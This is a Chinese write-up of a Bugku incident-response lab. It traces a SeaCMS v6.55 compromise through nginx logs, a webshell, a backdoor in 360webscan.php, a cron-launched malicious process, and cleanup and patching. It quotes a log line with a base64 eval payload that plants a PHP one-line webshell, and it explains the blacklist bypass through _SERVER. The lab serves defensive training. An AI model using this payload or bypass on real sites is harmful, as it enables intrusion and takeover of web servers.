bugku 网络安全事件应急响应

news2024/11/21 2:27:48

开启靶场:

开始实验:

使用Xshell登录服务器,账号及密码如上图。

1、提交攻击者的IP地址

WP:

找到服务器日志路径,通常是在/var/log/,使用cd /var/log/,ls查看此路径下的文件.

找到nginx文件夹。

进入nginx文件夹,找到access.log文件。

下载access.log到本地电脑,使用Notepad++打开。

发现38.207.130.14这个IP地址对多个页面发送HEAD请求,而且根据404后面的DirBuster-1.0-RC1 可得到是一个目录扫描工具,由此可得出攻击IP为38.207.130.14。提交成功!

2、提交攻击者目录扫描所使用的工具名称

通过第一题,得到扫描工具是DirBuster-1.0-RC1,根据题目提示工具名称要用小写,经过提交测试发现,提交的时候不需要带版本,只提交dirbuster就可以提交成功。

3、提交攻击者首次攻击成功的时间

继续查看access.log,发现了一些a.php上传请求,有可能是上传的木马文件,那"POST /a.php HTTP/1.1" 上面一条"POST /search.php?eval(base64_decode('ZmlsZV9wdXRfY29udGVudHMoJ2EucGhwJywnPD9waHAgZXZhbCgkX1BPU1RbMV0pOyA/PicpOw==')); HTTP/1.1"就是上传木马操作。

根据日志显示这个POST上传请求是使用base64编码的,那么我们使用Base64编码解码工具进行解码,根据解码内容可知确实是上传木马的操作。那么上传日期就是这个日志的操作时间,

题目要求格式为:DD/MM/YY:HH:MM:SS(例如31/01/2000:01:02:03),对攻击成功日期进行格式转换,转换后03/11/2023:15:03:35提交成功。

4、找到攻击者写入的恶意后门文件

提交文件名(完整路径)

根据前面我们知道a.php是上传的木马,也就是攻击者写入的恶意后门文件,那就可以查找a.php所在的完整路径。

find / -name a.php

得到完整路径为:/var/www/html/a.php,提交成功。

5、找到攻击者写入的恶意后门文件密码

我们知道恶意后门文件是a.php,上一题也知道路径,那么进入a.php文件所在的路径

cd /var/www/html/

ls查看文件,找到a.php文件,使用vi命令查看文件内容

方括号里面的“1”即为密码,提交成功。

6、找到攻击者隐藏在正常web应用代码中的恶意代码

提交该文件名(完整路径)

通过查看/var/www/html/下的文件,找了好长时间,发现/var/www/html/include/webscan/360webscan.php文件的这些代码很奇怪,通过搜索的出是隐蔽的后门木马。

那么/var/www/html/include/webscan/360webscan.php就是恶意代码的完整路径,提交成功。

7、识别系统中存在的恶意程序进程

提交文件名(完整路径)

首先使用“ps -aux”命令查进程,查出来的进程比较多,也不能判断那个是恶意进程。

既然是恶意进程,那就有计划任务,我们再查下计划任务。

cd /var/spool/cron
ls
vi www-data

发现只有一个计划任务,路径是/var/crash/php-fpm,提交成功。

8、识别系统中存在的恶意程序进程2

提交C&C服务器IP地址和端口(格式:1.1.1.1:22)

9、修复网站漏洞

进入网站目录,查看网站主页,index.php。

cd /var/www/html
ls

访问网站,http://47.103.131.47/index.php,网页下拉到底,可知为海洋CMS。

查看海洋CMS的版本

cd /var/www/html/data/admin
ls

找到ver.txt,是存放版本号的文件

vi ver.txt

得到海洋CMS的版本为v6.55

查询海洋CMS v6.55漏洞

漏洞分析:官方给出的修复是在parseIf函数里面加了黑名单。但是没有做SERVER变量的过滤,所以可以用SERVER变量的性质来达到写入命令。

修复方法1

修改/var/www/html/include/main.class.php文件里面的parseIf函数,补充黑名单增加_SERVER,保存后点击check,提交成功。

修复方法2

修改/var/www/html下的search.php文件;

在echoSearchPage()函数中增加一条过滤语句:if(strpos($searchword,'{searchpage:')) exit;

10、 删除恶意程序、文件、代码

删除/var/www/html路径下的a.php

rm a.php

删除/var/crash/路径下的

rm php-fpm

删除/var/www/html/include/webscan/360webscan.php里面的木马内容,记住不要删除整个文件,要不然系统会提示修复失败。

还有删除php-fpm的计划任务

cd /var/spool/cron/crontabs/
ls
vi www-data

删除红圈里的内容,:wq!保存。

删除后

checking完成,提交成功。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1686712.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

SAP Credit Management-Reconcile Documented Credit Decisions

ECC 升级S4后,经过事后迁移后,出现如下报错 找到了这里的配置路径: DCD settings – to maintain/complete Create Profile for Case Search -> no entry UKM_CASE – DCD search -> no search fields BC set UKM_DCD_CUST not activated -> transactio

温故而知新-秒杀项目篇【面试复习】

温故而知新-秒杀项目篇【面试复习】 前言版权推荐温故而知新-论坛项目篇【面试】秒杀项目中注册模块怎么实现的?秒杀项目中登录模块怎么实现的?秒杀项目中显示登录用户信息怎么实现的?SessionStorage是什么?为什么不用session而用token什么是…

2024年电工杯高校数学建模竞赛(B题) 建模解析| 大学生平衡膳食食谱的优化设计 |小鹿学长带队指引全代码文章与思路

我是鹿鹿学长,就读于上海交通大学,截至目前已经帮200人完成了建模与思路的构建的处理了~ 本篇文章是鹿鹿学长经过深度思考,独辟蹊径,实现综合建模。独创复杂系统视角,帮助你解决电工杯的难关呀。 本题&…

南京中科微Ci2451+11dbm发射功率 国产8位RISC内核无线MCU芯片

Ci2451是一款在现有的2.4GHz射频芯片基础上,内部集成8位RISC内核(精简指令集)MCU的SOC芯片。 Ci2451引脚图↑ 无线MCU解决方案,集成丰富的MCU资源、更小尺寸,来满足设计中的各种内存、功率、尺寸要求,充分…

QCC30xx如何实单声道MONO输出

有客户提出需要将QCC30xx的输出改为单声道输出(我们的QCC30xx是双声道输出,如果采用单声道输出,我们需要进行混音操作)。 客户采用目前最新的 SDK上将INCLUDE_STEREO屏蔽掉,直接进行编译,会报一系列的问题,编译不过。 也有很多客户尝试在各个模式下强制将通道输出设置…

cert-s

绕不过,啊对对对。 安全公司的东西都是无敌的。 菜你就多练。

C中十进制转十六进制示例

uint8_t QR_code_RxBfr[255]{0}; uint8_t TouchCode[100];memcpy (&Sys.TouchCode[0], &QR_code_RxBfr[0], Sys.QR_code_Len);Str &Sys.TouchCode[TmpVble];Sys.Card_ID 0; while(0 ! isdigit(*Str)){Sys.Card_ID Sys.Card_ID*10 *Str - 0;Str;} 最后在通过以下…

Springboot阶段项目---《书城项目》

一 项目介绍 本项目采用集成开发平台IntelliJ IDEA开发了在线作业成绩统计系统的设计与实现,实现了图书商城系统的综合功能和图形界面的显示,可以根据每个用户登录系统后,动态展示书城首页图书,实现了分类还有分页查询&#xff0c…

CAN报文,Motorola和Intel格式

CAN报文,Motorola和Intel格式 车载测试系列:CAN报文之Intel格式与Motorola格式 当信号在一个字节内实现(信号不跨字节)时,Intel模式和Motorola模式的信号字节顺序,完全一样: 信号的高位&am…

leetcode-顺时针旋转矩阵-111

题目要求 思路 1.假设现在有一个矩阵 123 456 789 2.我们可以根据19这个对角线将数据进行交换&#xff0c;得到矩阵 147 258 369 3.然后将矩阵每一行的数据再翻转&#xff0c;得到矩阵 741 852 963 代码实现 class Solution { public:vector<vector<int> > rot…

【HMGD】STM32/GD32 I2C DMA 主从通信

STM32 I2C配置 主机配置 主机只要配置速度就行 从机配置 从机配置相同速度&#xff0c;可以设置第二地址 因为我的板子上面已经有了上拉电阻&#xff0c;所以可以直接通信 STM32 I2C DMA 定长主从通信代码示例 int state 0; static uint8_t I2C_recvBuf[10] {0}; stat…

ROS2安装教程之强大辅助

第一次接触ROS2&#xff0c;安装时跟这个&#xff0c;跟那个教程&#xff0c;真的是一把泪&#xff0c;耗费数多个小时&#xff0c;依旧存在一些或多或少的问题&#xff0c;最主要的是永远提示 直到遇到了一个鱼香大佬&#xff0c;是真的香啊&#xff0c;好不容易找到的资料&a…

深度学习——图像分类(CNN)—训练模型

训练模型 1.导入必要的库2.定义超参数3.读取训练和测试标签CSV文件4.确保标签是字符串类型5.显示两个数据框的前几行以了解它们的结构6.定义图像处理参数7.创建图像数据生成器8.设置目录路径9.创建训练和验证数据生成器10.构建模型11.编译模型12.训练模型并收集历史13.绘制损失…

145.栈和队列:删除字符串中的所有相邻重复项(力扣)

题目描述 代码解决 class Solution { public:string removeDuplicates(string s) {// 定义一个栈来存储字符stack<char> st;// 遍历字符串中的每一个字符for(int i 0; i < s.size(); i){// 如果栈为空或栈顶字符与当前字符不相同&#xff0c;则将当前字符入栈if(st.e…

SpringBoot项目中redis序列化和反序列化LocalDateTime失败

实体类中包含了LocalDateTime 类型的属性&#xff0c;把实体类数据存入Redis后变成这样&#xff1a; 此时&#xff0c;存入redis不会报错&#xff0c;但是从redis获取的时候&#xff0c;会报错&#xff1a; com.fasterxml.jackson.databind.exc.InvalidDefinitionException: Ca…

AI - Transformer架构工作原理

一、概述 Transformer是由Vaswani等人在2017年提出的一种基于自注意力机制&#xff08;Self-Attention Mechanism&#xff09;的深度学习网络架构的大模型&#xff0c;被广泛应用于自然语言处理&#xff08;NLP&#xff09;领域&#xff0c;如机器翻译、文本生成等任务。它摒弃…

LabVIEW高温往复摩擦测试系统中PID控制

在LabVIEW开发高温往复摩擦测试系统中实现PID控制&#xff0c;需要注意以下几个方面&#xff1a; 1. 系统建模与参数确定 物理模型建立: 首先&#xff0c;需要了解被控对象的物理特性&#xff0c;包括热惯性、摩擦系数等。这些特性决定了系统的响应速度和稳定性。实验数据获取…

陕西煤矿化工集团如何投稿刊登到央媒

随着信息技术的飞速发展&#xff0c;国家级媒体平台已经成为了众多作者追求发表文章的热门选择。然而&#xff0c;要想在这些平台上成功发表文章&#xff0c;除了具备优秀的文稿质量外&#xff0c;还需要掌握一定的投稿技巧和策略。本文将为您详细介绍国家级媒体投稿方式&#…

samba_ubuntu_share_vmbox_vmware

_____ Ubuntu 利用 samba 与 win 直接共享文件夹 _____ samba Samba - 维基百科&#xff0c;自由的百科全书 (wikipedia.org) 用于 win 和 unix 直接访问资源 samba 为选定的 unix 目录建立网络共享&#xff0c; 使得 win 用户可以像访问普通 win 下的文件夹那样来通过网络来…

Discourse Discover 添加你的网站到 Discourse 官方

discourse discover 应该允许你把你的 Discourse 实例添加到 Discourse 的 https://discover.discourse.org/ 1 页面中。 直接在你网站的配置上搜索 Discourse Discover &#xff0c;余下的工作就可以交给 Discourse 了。 还没有选的&#xff0c;可以马上选上喔。 但显然排序…